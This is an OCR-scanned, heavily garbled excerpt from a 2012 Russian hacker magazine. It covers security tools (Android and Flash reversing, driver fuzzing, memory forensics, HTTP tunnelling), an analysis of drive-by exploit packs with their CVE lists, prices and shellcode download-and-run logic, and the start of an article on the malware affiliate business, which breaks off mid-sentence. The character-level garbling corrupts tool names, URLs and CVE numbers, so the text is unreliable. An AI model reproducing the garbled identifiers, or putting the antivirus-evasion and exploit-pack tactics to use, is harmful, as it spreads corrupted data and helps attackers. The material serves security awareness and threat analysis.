• и другие (а.оиі;, хсоі^Т псіз). 

Ѵ\з особенностей можно выделить: 
манипуляцию работающими процессами, 
автоматический Ьаскігаскіпд в дизассем- 
блере, Ііпих/ѵѵіпсіоѵѵз/геппоіе отладочный 
АРІ-интерфейс, компилятор/декомпилятор С, 
совместимый с бОВ-сервером отладчик. 



АМОРОЮ-ПРИЛОЖЕНИЕ 

НАБЛЮДЕЧКЕІ 

АРКіпзресІог — удобный инструмент для 
анализа арк-файлов. С его помощью можно 
проанализировать и отреверсить любой испол- 
нимый файл под АпбгоісІ. Основная фишка этого 
проекта — графический уровень абстракции, 
которому обычно уделяют минимум внимания 
в проектах такого типа. Проект представляет 
собой мощный анализатор для исследования 
вредоносного ПО и анализа защищенности при- 
ложений для платформы АпбгоісІ. АРКіпзресІог 
в наглядной форме отображает: 

• граф передачи управления (СР6); 

• Оаіѵік-код; 

• байт-код; 

• зтаіі-код; 

• Заѵа-код; 

• граф вызовов функций; 

• права приложения; 

• АпбгоісІІѵіапіІ'езЕхппІ. 

Особенности приложения: 

• представление потока управления в виде 
графа; 

• связь между графом и исходным кодом; 

• список методов; 

• списокстрок; 

• потокданных в да иную точку /из данной 
точки; 

• возможность переименования функций 
и перемен. 
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Автор: 

Дмитрий «сгДбН» 
Олексюк 

УРІ: 

сосіе.доодіе. сот/р/ 
іос1І^и22ег 

Система: 

ѴѴІПСІОѴѴБ 



ИЩЕМ БАГИ в ДРАЙВЕРАХ ѴѴІМР0ѴѴ5 



ІОСТІ Ру 22 ег предназначен для 
поиска уязвимостей в ѴѴіпсІоѵѵз- 
драйверах. Программа ставит хук 
на функцию МШеѵісеІоСопІгоІРіІе 
и начинает контролировать ІОСТІ- 
запросы в рамках всей систе- 
мы. Далее программа изменяет 
входные параметры ІОСТІ-запроса 
с целью нахождения уязвимостей 
в драйверах. В свежей версии 
были добавлены следующие ново- 
введения: 

• наличиебІЛ; 

• поддержка ѴѴіп б 0ѴѴ5 7; 



• полная поддержка 64-разряд- 
ных версий ѴѴіпсІоѵѵз; 

• мониторинг исключений; 

• режим «честного фаззинга» 
(отправка ІОСТІ-запросов из 
контекста процесса фаззера); 

• интеграция с проектом ОЬдСЬ; 

• разные режимы генерации 
некорректных данных для 
фаззинга; 

• возможностьзапуска фаззин- 
га/мониторинга на начальных 
этапах загрузки операционной 
системы. 




Автор: 

ЗеЬазііап Рогбі 

УКІ: 

НирБ://дШпиЬ.сопп/ 

БрОГБІ/ЗѴѴРРЕіООІБ 

Система: 

*піх/ѵѵіп 





- - в- - і «1* 

мЬміігаѵікхі 




Автор: 

ЗеЬаБііап ѴѴеЬег 

УРІ: 

Нир-іиппеІ.Боигсе- 

^огде.пеі 

Система: 

ѵѵіп 




ПРОНИКНОВЕНИЕ во РІА5Н 

5ѴѴРРЕІООІ5 — набор инструментов для ревер- 
синга РІазЬ-файлов. Программа была пред- 
ставлена на 501ІРСЕ Возіоп 2011 исследова- 
телем ВеЬазІіап РогзЕ Инструмент в первую 
очередь предназначен для специалистов по 
поиску уязвимостей и включает в себя все 
необходимое (за исключением фазера) для 
поиска уязвимостей в обработчиках 5ѴѴР- 
файлов: 

• РІазЬ Оіззесііог (бинарный просмотрщик 
5ѴѴР-файлов); 

• 5ѴѴР Рагзег (библиотека для написания 
собственного парсера); 

• Міпітігег (автоматический минимизатор 
крэшей 5ѴѴР-файлов); 

• РР ОеЬидде г (динамический трей сер РІазЬ 
РІауег); 

• 5і;а1;з6епега1;о г (генератор статистики 
о 5ѴѴР-файле). 

Если у тебя есть файл, приводящий к па- 
дению РІазЬ, то с помощью этого набора не 
составит никакого труда: 

• просмотреть файл, приводящий к паде- 
нию; 

• определить причину падения; 

• получить минимальный аварийный файл; 

• понять логику, приводящую к падению. 

Для корректной работы программы не- 
обходимы ^НеxVіеѵѵ, зрІіЬ и Виддегу. 



КОПАЕМСЯ В ДЕБРЯХ РАМ 

Ѵоіаіііііу — это фреймворк с полностью от- 
крытым исходным кодом, представляющий 
собой набор написанных на РуіЬоп инстру- 
ментов для извлечения цифровых артефактов 
из энергозависимой памяти (РАМ). Это может 
быть полезным при расследовании инци- 
дентов, анализе вредоносного программного 
обеспечения или просто при исследовании 
работы программ, обрабатывающих критич- 
ные данные (например, номера платежных 
карт). Но с помощью него можно извлечь и бо- 
лее низкоуровневую информацию, такую как: 

• запущенные процессы; 

• открытые сетевые сокеты; 

• открытые сетевые соединения; 

• загруженные ОЕЕдля каждого процесса; 

• открытые файлы для каждого процесса; 

• открытые обработчики реестрадля каждо- 
го процесса; 

• адресуемую память; 

• модули ядра ОС; 

• маппинг физических смещений на вирту- 
альныеадреса; 

• информацию дескриптора виртуальных 
адресов. 

Понятно, что порой этого недостаточно 
для качественного анализа памяти, и в такой 
ситуации как раз к месту будет возмож- 
ность написания собственных плагинов для 
Ѵоіаіііііу. 



ТУННЕЛИРУЕМ ТРАФИК ПО НТТР 

НТТРТиппеІ, как несложно догадаться из 
названия программы, позволяет туннелиро- 
вать сетевые соединения через НТТР-прокси, 
используя чистые НТТР СЕТ- и Р05Т-запросы. 
Инструмент может быть полезен для тех поль- 
зователей, которые сидят за файрволами. Если 
доступ в сеть разрешен через НТТР-прокси, 
значит можно использовать НТТРТиппеІ и, 
скажем, Іеіпеі или РРР, чтобы соединиться 
с компьютером в обход сетевой защиты. Про- 
ект обладает рядом особенностей, выгодно 
отличающих его от других: 

• Рогі; тарріпд; 

• поддержка 50СК54, 50СК55; 

• шифрование и сжатие данных; 

• веб- интерфейс для администратора; 

• обнаружение вторжений; 

• возможность использовать 5І;апсІаІопе- 
или Ьо5І;есІ-серверы; 

• возможность авторизации через ЮАР или 
МуСОЕ. 

Программа состоит из двух компонентов: 
клиента, который располагается за файрволом 
и принимает сетевые соединения на опреде- 
ленный порт, и сервера, который располагает- 
ся в интернете. Он принимает НТТР-запросы 
от клиента и перенаправляет их на удаленные 
серверы. Данный сервер имеет два вида 
реализации: РНР-скрипт на веб-сервере и от- 
дельный сервер, который существует в виде 
РегІ-скрипта и ѵѵіп32-бинарника. 
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МАШАІІЕ 



Евгений Дроботун (сІгоЬоіипйхакер.ги) 




АТАКИ И СВЕЖИЕ 
ЭКСПЛОЙТ-ПАКИ 

ИЗУЧАЕМ РАСПРОСТРАНЕНИЕ МАЛВАРИ 
ПОСРЕДСТВОМ ОКІѴЕ-ВУ ЗАГРУЗОК 




На сайте ѵѵѵѵѵѵ.ехрІоИ- 
сІЬ.сопп можно найти 
подробные описания 
различных уязвимостей 
и примеры эксплойтов 
для них. 

Отличный онлайн- 
анализатор эксплойт- 

па ко в^/уераууМл 

ізесІаЬ.ого . Производит 
раскриптовку, 
деобфускацию, 
распознавание 
уязвимостей, выделение 
и анализ шелл-кода. 



С каждым годом по виду приличным сайтам (а точнее — их темным повелителям 
и черным властелинам) все больше и больше нравится заливать на компьютеры 
пользователя всяческую малварь. А нам — интересно узнать, как это получается 
и во сколько что обходится. Так не будем же себя сдерживать! 



РШ 

в делераскриптовки 
и снятия обфускации 
с эксплойт-паков очень 
полезна утилита МаІгіІІа. 
Ищи ее на диске. 



ля начала кратко рассмотрим схему 
сІгіѵе-Ьу атаки — на случай, если ты 
ее забыл. Или, например, тебя замо- 
розили двадцать лет назад, и теперь, окон- 
чательно проснувшись, ты все еще думаешь, 
что самый эффективный способ заразить 
пользователя — подсунуть ему дискету с ин- 
фицированным СО-Мап'ом. Итак, смотрим 
на схему. Сначала пользователь попадает 
на сайт, содержащий код, который перена- 
правляет запрос на сторонний сервер, на 
котором хранится эксплойт. В качестве кода, 
перенаправляющего пользователя, может 
использоваться тег іі^гате с определенными 
параметрами или, например, ЭаѵаВсгірІ- 
код, загружающий эксплойт. Как видно из 
рисунка, прежде чем эксплойт будет за- 
гружен, может произойти любое количество 
переадресаций на другие сайты. 



Основная задача эксплойта — это за- 
пуск шелл-кода посредством эксплуатации 
какой-либо уязвимости в атакуемой системе. 
Шелл-код обычно находится в теле самого 
эксплойта, как правило, в зашифрованном 
и обфусцированном виде. 

В большинстве случаев в задачу шелл-кода 
входит скачивание и запуск на исполнение 
какого-нибудь (обычно вредоносного) файла 
из сети. Для этого как нельзя лучше подходит 
АРІ-функция ІІРЮоѵѵпІоасІТоРіІе из библио- 
теки игІтоп.сІІІ, и подавляющее большинство 
вредоносов активно ею пользуются. 

Общий алгоритм работы большинства 
шелл-кодов таков: 

• получение адреса начала кегпе132.с111 

в памяти (в большинстве случаев он просто 
дергается из РЕВ); 

• поиск в кегпе132.с111 функции ОеіРгосАсІсІгезз; 



• получение адреса АРІ-функции ІоасЛіЬгагу 
с помощью ОеіРгосАсІсІгезз; 

• загрузка с помощью ІоасіиЬгагу библиоте- 
ки игІтоп.сІІІ; 

• получение адреса ОРЮоѵѵпІоасІТоРіІе 
и адреса какой-либо функции 
запуска кода (обычно это ѴѴіпЕхес 
или ВЬеІІЕхесиІе); 

• запуск загруженного файла 
на исполнение. 




Нынче на просторах интернета эксплойты 
редко действуют в одиночку. Как настоящие са- 
нитары леса, они сбиваются в стаи, именуемые 
эксплойт-паками или связками, и действуют 
сообща, тщательно выбирая момент и слабое 
место для атаки. 
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Вредоносный ^аѵа5с^ір(-код на зараженном сайте 
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Пример шелл-кода эксплойта ЕхрІоіІ.НТМЫЕЗІісе.аа 




Эксплуатация МОАС в ВІаскНоІе Ехріоіі Кі( (обфускация и криптовка сняты) 





Закриптованый и обфусцированый текст ЕІеопоге Ехріоіі Кіі 



ГиМПОП ПЮСК 
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Эаѵа5сгір(-код, эксплуатирующий уязвимость в механизмах обработки ошибок 
РЫпоЗсгірІ Епдіпе в Эаѵа (СѴЕ-2011-3544) 



Если попытаться заглянуть внутрь какой- 
нибудь связки эксплойтов, то увиденное пока- 
жется нагромождением всяческого мусора. По- 
нятное дело: чтобы выжить, нужно постараться 
оставить антивирус с носом, и код эксплойт-пака 
нуждается в криптовании и обфусцировании. 
Причем менять криптовку и обфускацию необхо- 
димо достаточно часто (эта процедура именуется 
чисткой эксплойт-пака). 

Времена, когда все эксплойты в связке 
без разбору запускались один за другим 
в надежде, что какой-нибудь пробьется, уже 
давно прошли. Теперь, прежде чем начать свое 
грязное дело, эксплойт-пак проверяет версию 
ОС, тип браузера, наличие установленных 
плагинов и их версии и только потом запускает 



подходящий для данной ситуации эксплойт, 
чтобы достичь максимальной эффективности 
(ну а в деле бгіѵе-Ьу загрузок эффективность, 
как мы знаем, определяется такой характери- 
стикой, как пробив, который показывает про- 
цент зараженных машин относительно общего 
числа произведенных атак). 

Что касается уязвимостей, которые экс- 
плуатируются различными связками, то помимо 
уязвимостей компонентов самой ОС большой 
популярностью пользуются уязвимости в про- 
дукции от компании АсІоЬе, в частности АбоЬе 
Реабег, и в баѵа от компании Огасіе Согрогаііоп. 

Интересно, что в составе почти всех 
эксплойт-паков есть эксплойт для очень 
старой (похоже, что даже бессмертной :)) 



уязвимости с названием МісгозоЙ Оаіа Ассезз 
Сотропепіз (МОАС). Патч для нее вышел аж 
в мае 2006 года, но создатели эксплойт-паков 
пока не очень торопятся исключать эксплуата- 
цию этой уязвимости из своих продуктов. 

По оценкам разных антивирусных компаний 
и исследовательских лабораторий, рейтинг 
популярности эксплойт-паков на сегодня вы- 
глядит так: 

• ВІаскЬоІе Ехріоіі КіС‘ 

• ЕІеопоге Ехріоіі; КІІ;; 

• МисІеагРаск; 

• РЬоепіх ЕхрІоіСз КІІ;; 

• Бакига Ехріоіі; Раск. 

Итак, начнем по порядку... 
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МАШАІІЕ 



РЕЙТИНГ 

ПОПУЛЯРНОСТИ 

ЭКСПЛОЙТ-ПАКОВ 



ВІаскНоІе ЕхрІоИ КИ 

В настоящее время безусловный лидер. Практически в каждой 
второй строчке на таіѵѵагесіоппаіпеіізі.сопп красуется имя этого 
эксплойт-пака. По разным оценкам, занимает объем 90-97% рынка 
сплоитов. Создателями он позиционируется вовсе не как эксплойт- 
па к для выполнения вредоносных действий, а как система сете- 
вого тестирования компьютеров. На сегодняшний день актуальна 
версия 1.2.3, включающая следующие уязвимости: 

• СѴЕ-2006-0003 (Місгозо^І: Оа1:а Ассезз Согпропепііз (МОАС)); 

• СѴЕ-2007-5659/2008-0655(АбоЬеРеасіегСоІІаЬСоІІес^ЕтаіІІпГо); 

• СѴЕ-2008-2992 (АбоЬе Реабег ЗаѵаБсгірІ: РгіпН ВиНегОѵегЛоѵѵ); 

• СѴЕ-2009-0927(АбоЬеРеабегСоІІаЬ6е^Ісоп); 

• СѴЕ-2010-0188(АбоЬеРеабегиЬТіН); 

• СѴЕ-201 0-0842 (Заѵа ЗРЕ МіхегЗериепсег Іпѵаііб Аггау Іпбех Рето1:е 
Собе Ехеси^іоп ѴиІпегаЬіІі^у); 

• СѴЕ-201 0-1 885 (ѴѴіпбоѵѵз Неірапб Виррогі: Сеп^ег РгоЩсоІ Напбіег 
ѴиІпегаЬіІі^у); 

• СѴЕ-201 1-0559 (АбоЬе РІазИ РІауег Меітіогу Соггирііоп); 

• СѴЕ-201 1 -3544 (Заѵа РЫпоЗсгірІ: Епдіпе); 

• СѴЕ-2012-0507иаѵаАЩтіс). 

Стоимость (в долларах): годовая лицензия — 1500, полугодовая 
лицензия — 1000, трехмесячная лицензия — 700, обновление крипто- 
ра (чистка) — 50, смена домена — 20, мультидомен — 200, аренда на 
месяц — 500, аренда на неделю — 200, тестирование (24 часа) — 50. 

Создателей этой связки можно похвалить за оперативность. 

Ее последняя версия включает достаточно новую (на момент на- 




ВІаскНоІе Ехріоіі Кіі собственной персоной (панель показа статистики) 

писания статьи) уязвимость СѴЕ-2012-0507. Уязвимость скрывается 
в реализации класса АіотісРеІ'егепсеАггау, в которой происходит 
неправильная проверка на принадлежность к типу ОЬІесіП, что по- 
зволяет выполнить специально подготовленный апплет или класс 
за пределами песочницы ЗРЕ. 



ЕІеопоге ЕхрІоН Кі( 

Появился в конце 2009 года, за это время сменил шесть версий 
и практически всегда был в тройке лидеров по популярности. Ак- 
туальная версия на сегодня — 1.8.91. Работает с уязвимостями: 

• СѴЕ-2006-0003 (МісгозоН Оа^а Ассезз Соітіропеп^з (МОАС)); 

• СѴЕ-2006-4704(ѴѴМІОЬіес^Вгокег); 

• СѴЕ-2008-2463(М508-041 М3 АссеззЕпарзИо^Ѵіеѵѵег); 

• СѴЕ-2010-0188 (АбоЬе РеабегЫЬШ; 

• СѴЕ-201 0-0806 (Іп1:егпе1: ЕхрІогегОНТМЕ ВеЬаѵіогзІЗзеА^ІіегРгее); 

• СѴЕ-201 0-1885 (ѴѴіпбоѵѵз Неірапб 5иррог1:Сеп1;егРго1:осоІ Напбіег 
ѴиІпегаЬіІі^у); 

• СѴЕ-2010-4452(Заѵа СІаззЕоабегРегтіо^е Собе ЕхесиЬоп); 

• СѴЕ-2011-0558 (АбоЬе РІазЬ РІауегІп^едегОѵегОоѵѵ); 

• СѴЕ-201 1-0559 (АбоЬе РІазЬ РІауег МетогуСоггир1:іоп); 

• СѴЕ-2011-0611 (АбоЬе РІазЬ РІауег ЕтЬеббеб .зѵѵНіІе); 

• СѴЕ-201 1-2462 (АбоЬе Реабег1330 0Ь)ес1: Метогу Соггир1;іоп); 

• СѴЕ-2011-3521 (Заѵа Урбане); 

• СѴЕ-201 1 -3544 (Заѵа РЬіпоЗсгірІ; Епдіпе). 

Стоимость (в долларах) — 1000 в год, чистка — 50, 
смена домена — 50, тестирование (24 часа) — 40. 




ЕІеопоге Ехріоіі Кіі (статистика по странам) 
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сІгіѵе-Ьу атаки и свежие эксплойт-паки 



Мисіеаг Раск 

За время своего существования (с середины 2010 года) сменил 
всего лишь две версии (последняя вышла в начале 2012 года). 
Это не помешало ему обогнать некоторых исконных, сермяжных 
и вообще классических лидеров и занять почетное третье место. 
Эксплуатирует он следующий список: 

• СѴЕ-2006-003 (МІСГ050Й Оа1;а Ассезз Соппропеп^з (МОАС)); 

• СѴЕ-2007-5659/2008-0655(АбоЬеРеасіегСоІІаЬСоІІес^ЕтаіІІпГо); 

• СѴЕ-2008-2463(М508-041 М5 АссеззЭпарзИо^Ѵіеѵѵег); 

• СѴЕ-2008-2992 (АбоЬе Реабег ЗаѵаЭсгірІ; РгіпН ВиНегОѵегЛоѵѵ); 

• СѴЕ-2008-4844 (Іп^егпе^ ЕхрІогегУХМЕ Ехріоі^); 

• СѴЕ-2009-0075/0076 (М509-002-ІЕ7 Метогу Соггир^іоп); 

• СѴЕ-2009-0927(АбоЬеРеабегСоІІаЬ6е^Ісоп); 

• СѴЕ-2009-1136 (ІЕ ОѴѴС ЭргеабзИееІ; Ас1:іѵеХсоп1:гоІ Меппогу 
Соггиріііоп); 

• СѴЕ-2010-0188(АбоЬеРеабегиЬТіН); 



• СѴЕ-2010-0840(ЗаѵаОВЕ); 

• СѴЕ-2010-1885 (ѴѴіпбоѵѵз Неірапб Эиррогі; Сепіег Ргоіосоі Напбіег 
ѴиІпегаЬіІі^у); 

• СѴЕ-2011-3544иаѵа РЫпо Эсгірі; Епдіпе). 

Стоимость годовой лицензии — 900 долларов (не так уж и мно- 
го по сравнению с остальными). 

Особенностью новой версии этого эксплойт-пака являются так 
называемые «умные редиректы». С помощью различных ухищрений 
он распознает системы сбора вредоносных сэмплов и редиректов, 
которые активно используются антивирусными компаниями, и осу- 
ществляет атаку только в том случае, если перед ним находится 
реальный пользователь. Для этого он довольно тщательно прячет 
и обфусцирует перенаправляющие іі^гат'ы, а также проверяет 
наступление события ОпМоизеМоѵе (то есть курсор мыши должен 
двигаться, иначе перенаправления не произойдет). 



РИоепіх ЕхрІоИ'з КН 

Ветеран коммерческого рынка эксплойт-паков. Появился в сере- 
дине 2009 года и прошел путь длиною в девять версий. В былые 
времена возглавлял хит-парад. Самая свежая версия на сегодня — 
3.1. Эксплуатируемые уязвимости: 

• СѴЕ-2006-0003 (Місгозо^І; Ва1:аАссеззСоппропеп1:з(МОАС)); 

• СѴЕ-2007-5659/2008-0655(АбоЬеРеабегСоІІаЬСоІІес^ЕтаіІІп^о); 

• СѴЕ-2008-2992 (АбоЬе Реабег Заѵазсгірі; РгіпН ВиНегОѵегОоѵѵ); 

• СѴЕ-2008-5353 (бРЕСаІепбаг баѵа Оезегіаііге); 

• СѴЕ-2009-0927(АбоЬеРеабегСоІІаЬ6е^Ісоп); 

• СѴЕ-2009-3867(баѵа65В); 

• СѴЕ-2009-4324 (АбоЬе Реабегбос.тебіа.пеѵѵРІауег); 

• СѴЕ-2010-0188 (АбоЬе РеабегЫЬТіН); 

• СѴЕ-2010-0886 (баѵа ОерІоуппеп1:ТооІкі^Соппропеп^); 

• СѴЕ-2010-1240 (АбоЬе Реабег ЕтЬеббеб ЕХЕБосіаІ Епдіпеегіпд); 

• СѴЕ-201 0-1297 (АбоЬе РІазЬ РІауегМеѵѵРипс1:іоп Іпѵаііб РоІп^егСІзе); 

• СѴЕ-201 1 -3544 (баѵа РЬіпоЭсгірІ: Епдіпе); 

• СѴЕ-2012-0507(баѵаАЩтіс). 

Один из самых дорогих сплоит-паков, стоимость — 2200 долларов. 




Админка от РЬоепіх ЕхрІоіГз Кіі 



Закига ЕхрІоН Раск 

Новичок в деле засылки вредоносного кода ничего не подозреваю- 
щим пользователям. Появился в начале текущего года, и, судя по 
всему, это творение рук российских умельцев. Имеет в своем соста- 
ве эксплойты к следующим уязвимостям: 

• СѴЕ-2006-0003 (МісгозоН Оа^а Ассезз Сотропеп^з (МОАС)); 

• СѴЕ-201 0-0806 (ІЕРеегз Рето1:е Собе ЕхесиЬоп); 

• СѴЕ-201 0-0842 (баѵа бРЕ МіхегЭедиепсег Іпѵаііб Аггау Іпбех Рето1:е 
Собе ЕхесиЬоп ѴиІпегаЬіІі^у); 

• СѴЕ-201 1 -3544 (баѵа РЬіпоЭсгірІ; Епдіпе). 

Как видим, даже в этом, новом, эксплойт-паке эксплуатируется 
МОАС-уязвимость. Не любит народ качать обновления, ох не любит... 





ЗАКЛЮЧЕНИЕ 



Если проанализировать состав связок, то видно, что во многих из 
них используются уязвимости, для которых уже вышли обновле- 
ния и информация о которых уже появилась в свободном доступе. 
Оно и понятно: использовать 0-бау-уязвимости в массовых 
эксплойт-паках дорого и вряд ли даст серьезный прирост про- 
бива. Учитывая, что большинство пользователей крайне неохотно 
ставят всякие обновления и заплатки, устраняющие уязвимости 
(а многие даже и не знают, что у них, к примеру, на компьютере 
установлена баѵа), можно сделать вывод: создателям эксплойт- 
паков на хлеб с маслом хватает. ^ 
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Киберкрайм 

изнутри 



НЕКОТОРЫЕ ГРАНИ 
МАЛВАРЬ-БИЗНЕСА 
ГЛАЗАМИ ЕГО 
УЧАСТНИКА 



Времена, когда вирусы писали лишь для удовольствия или 
самоутверждения, давно прошли. На смену романтике той 
поры пришел бизнес со своим тонким расчетом. Только на- 
чинающие вирмейкеры не задумываются о том, как бы за- 
работать на своих знаниях и умениях. Более опытные рубят 
кеш, просиживая ночи за своими мониторами и ковыряя ис- 
ходники софта, о котором не принято говорить на публике. 

ХАКЕР 07/162/2012 







Киберкрайм изнутри 



иберкрайм-бизнес на сегодняшний день являет- 
ся одним из самых прибыльных занятий. Годовой 
оборот в этой отрасли, по некоторым данным, 
сравним с оборотом в наркоторговле. Миллиарды долла- 
ров проходят через руки различных ботоводов, вирмей- 
керов, Кардеров и спамеров. Среднестатистический 
миллионер в этом бизе совсем недавно отпраздновал 
свой 20-й день рождения. А к 26 годам большинство из 
них уже уходят на пенсию, обеспечив свою семью кешем 
на много лет вперед. 

Как же можно заработать такие деньги за столь 
короткий срок? Достаточно ли для этого только хорошо 
кодить или нужно что-то еще? Можно ли доверять 
людям, которые работают на тебя или вместе с тобой? 
Чтобы ответить на эти вопросы, нужно разобраться, как 
устроен этот бизнес. 



низы 



Все начинается с веб-мастеров. Веб-мастера — это 
такие люди, которые создают в сети кучу сайтов с одной- 
единственной целью — привлечь побольше народа. 

Когда ресурс получает свою долю трафика, веб-мастер 
ищет, куда бы его продать. Эти поиски обычно длят- 
ся недолго, поскольку на просторах Сети существуют 
тысячи партнерок, которые заточены под самые разные 
ниши. Некоторые принимают трафик «для взрослых», 
некоторые — фарматрафик, другие — кинотрафик и так 
далее. Веб-мастер получает деньги либо за клик по 
баннеру партнерки, который висит на его ресурсе, либо 
за покупку контента с сайта партнера. 

На этом этапе у мастера есть выбор: либо зараба- 
тывать относительно честно, но и не сильно много, 
либо перейти на темную сторону и работать с малварь- 
партнерками, богатея не по дням, а по часам. Модель 
вознаграждения веб-мастерам в киберкраймовых пар- 
тнерских программах немного отличается от остальных. 
Так как малварь — это софт, который ставится на машину 
жертвы, то тут ребятам часто платят не за продажи или 
клики, а за инсталлы. 




СОТНИ, ЕСЛИ НЕ ТЫСЯЧИ ВЕБ- 
МАСТЕРОВ ГОНЯТ СВОЙ ТРАФ НА 
МАШАЯЕ-ПАРТНЕРКИ И ПОЛУЧАЮТ 
СВОИ КРОВНЫЕ (НЕРЕДКО БОЛЕЕ 
10 000 ДОЛЛАРОВ В МЕСЯЦ) 



Несколько лет назад на коне были кодек-партнерки, 
сейчас их уже практически не осталось. Выглядело это так: 
пользователь заходил на сайт, который предлагал ему по- 
смотреть какое-нибудь Від Тііз видео абсолютно бесплатно, 
но для этого нужно было скачать и установить суперкодек, 
без которого ну просто никак. Большинство юзеров на- 
жимали ОК не глядя, а кодек устанавливал, помимо себя, 
еще кучу дополнительного стаффа. Например, это мог быть 
фрауд-антивирус, который всеми правдами и неправдами 
уговаривал хозяина ПК купить себя. 

Мастера получали за каждый инсталл свои несколь- 
ко центов, причем вознаграждение часто зависело от 
гражданства жертвы. Например, за откормленного на 
бургерах американца платили больше всего, а вот за 
наших соотечественников давали ровно О баксов. Оно 
и понятно, ведь среднестатистический гражданин США 
имееттри кредитки и готов расплачиваться ими налево 
и направо, в отличие от граждан СНГ, которые в первую 
очередь кинутся искать кряк на несуществующий анти- 
вирь или просто переустановят винду. 

Таким образом сотни, если не тысячи веб-мастеров 
гонят свой траф на малваре-партнерки и получают свои 
кровные. Которые частенько переваливают за 10 000 
долларов в месяц. Владельцы партнерских программ 
всячески поощряют своих мастеров, проводя разные 
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НАПРАВЛЕНИЯ КИБЕРКРАЙМА 



Интернет-мошенничество. Включает 
мошенничество в системах дис- 
танционного банковского обслуживания, 
фишинговые атаки, хищение электронных 
денег. Следует отметить, что в это направ- 
ление входят и услуги по обналичиванию 
похищенных денежных средств (на данную 
услугу приходится доля, занимающая до 
40% от всего направления). 

Спам. Включает не только услуги 
рассылки нежелательных сообщений 
электронной почты, но и партнерские 
программы по нелегальной продаже 
медикаментов, контрафактной продукции 
и поддельного программного обеспечения. 

□ Внутренний рынок (СуЬегсгіте 
Іо суЬегсгіте или С2С). Включает 



услуги по анонимизации интернет- 
активности и продаже трафика, 
эксплойтов, вредоносного программного 
обеспечения и загрузок. Существуют даже 
такие услуги, как «бот-сеть под ключ». 

00о5-атаки. Включаетуслуги по 
организации атак, направленных на 
отказ в обслуживании. 

О Иное. Этот раздел включаетуслуги, 
не имеющие на сегодняшний 
день широкого спроса и предложения. 
Например, промышленный шпионаж, 
атаки на бренд, атаки на мобильные 
устройства и прочее. Это направление 
объединяет столь разные угрозы, что 
крайне сложно дать ему какое-либо 
единое название. 






Рейты на одной из кодек-партнерок 
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МАШАІІЕ 



конкурсы и разыгрывая ценные призы, например ВМѴѴ 
Х7. Предвкушение наживы и халявных внедорожников 
заставляет биться быстрей сердце и работать более 
усердно, повышая тем самым свои доходы и доходы 
владельцев партнерок. 



ДВИГАЕМСЯ ВВЕРХ 



Если с веб-мастерами все примерно ясно, то владельцы 
партнерокуже более загадочные личности. Пункты приема 
трафика открываются по всему интернету, и доля заточен- 
ных под вирусный трафик достаточно велика. Владельцы 
таких сетей богаты, но хотят быть еще более богатыми. Для 
этого ребятам нужно привлечь как можно больше мастеров 
с их трафом, что можно обеспечить только хорошим кон- 
вертом. Ради этого конверта в ход идут любые приемы. 

Если говорить об антиспайваре-партнерках, то тут 
залогхороших продаж — это страх пользователя. Но 
прежде, чем начать пугать юзера, надо как-то заставить 
его скачать и установить софт. Вот тут-то и начинаются 
основные проблемы. Кодеры, работающие на хозяев 
партнерских программ, без устали трудятся над всякими 
тулзами, которые всеми способами пытаются заставить 
пользователя загрузить лоадер, а тот в свою очередь уже 
запустит на ПК все возможное соцветие малварного ПО, 
которое найдется у начальства. 

Сам по себе лоадер уже считается вредоносом, и кибер- 
мошенники тратят много сил, чтобы антивирусы не могли 
задетектить их софт. Для этих целей нанимаются специ- 
ально обученные люди, которые 24 часа в сутки и 7 дней 
в неделю занимаются только тем, что изменяют код своих 
троев для ухода от АѴ. Чем крупнее бизнес, тем интенсив- 
нее детектится лоадер и тем усерднее работают кодеры. 
Даже обычные наемные программисты, которые не имеют 
доли в бизнесе, получают до нескольких тысяч долларов 
в месяц. Если учесть, что зачастую все они живут и работа- 
ют в провинции, то это довольно большие деньги. 



Таким образом малваре-партнерки обеспечива- 
ют широкий канал для распространения зловредов 
разного калибра. Успешные владельцы этих структур 
зарабатывают уже миллионы. Потоки трафика, прохо- 
дящего через них, просто огромны, а позициям в поис- 
ковой выдаче Гугла по ключевым для их биза запросам 
позавидуют даже самые лучшие 5Е0 -профессионалы. 
Их авторитет держится на репутации, которую они 
заслуживают регулярными выплатами своим веб- 
мастерам и высокими рейтами. 

Но и они всего лишь посредники, которые довольно 
хорошо известны в Сети: чтобы тебе доверяли, нужно 
быть публичным человеком... разумеется, насколько 
это возможно в такого рода деятельности. Настоящими 
серыми кардиналами тут выступают производители 
малвари — те, кто кодит, развивает и продает свои 
вредоносы. О них не знает широкая общественность. Они 

инсталлились кодеки 





РЫНОК КОМПЬЮТЕРНЫХ ПРЕСТУПЛЕНИЙ В ЛИЦАХ: ПУТЬ ОДНОГО ВРЕДОНОСА 




Илья Сачков, генеральный 
директор 6гоир-1В 

Проиллюстрируем тему 
киберкрайм-биза на приме- 
ре мошенничества в си- 
стемах интернет-банкинга 
— оно наиболее популярно 
среди нынешних киберпре- 
ступников и совершается 
с использованием вредо- 
носного программного обе- 
спечения. 

ПУНКТ ПЕРВЫЙ: СОЗДАНИЕ БОТ-СЕТИ 

Для совершения мошеннических операций 
с банковскими счетами киберпреступники 
используют бот-сети. Их создание требует нали- 
чия определенного вредоносного обеспечения 
и способов его распространения. Все это можно 
заказать на хакерском форуме. 

Среди обитателей форума есть различные 
пользователи, которые специализируются на 
конкретных видах услуг. 



Действующее лицо: Вирмейкер 

В первую очередь стоитупомянуть вирусописа- 
теля. Он создает банковские трояны, эксплойты 
и иные вредоносные программы. Не будем его 
героизировать и сразу отметим, что товарищ на- 
рушает статью 273 («Создание, использование 
и распространение вредоносных компьютерных 
программ») Уголовного кодекса РФ. Максималь- 
ное наказание, предусмотренное этой ста- 
тьей, — лишение свободы на семь лет. 

Действующее лицо: Взломщик 

К вирусописателю обращаются так называемые 
взломщики, которые заинтересованы в приоб- 
ретении связки эксплойтов. После покупки экс- 
плойта взломщик взламывает какой-либо сайт 
с высокой посещаемостью и устанавливает там 
приобретенную связку. Теперь наш взломщик 
может заниматься «продажей трафика», то есть 
предоставлять услуги загрузки вредоносных 
программ на компьютеры посетителей сайта. 
Кстати, чуть не забыл сказать, что взломщик 
только что нарушил не только статью 273, но 



и статью 272 («Неправомерный доступ к ком- 
пьютерной информации»), также предусматри- 
вающую лишение свободы до семи лет. 

Действующее лицо: Владелец бот-сети 

А вот на форуме появляется третий персонаж — 
будущий владелец бот-сети. Бот-сети у него пока 
еще нет, а денег очень хочется, поэтому он ищет 
вирусописателя, который продаст ему банков- 
ский троян и панельуправления бот-сетью. 

Троян будет похищать денежные средства с бан- 
ковских счетов, а панель позволит контролиро- 
вать ботов и осуществлять действия, несанк- 
ционированные пользователями зараженных 
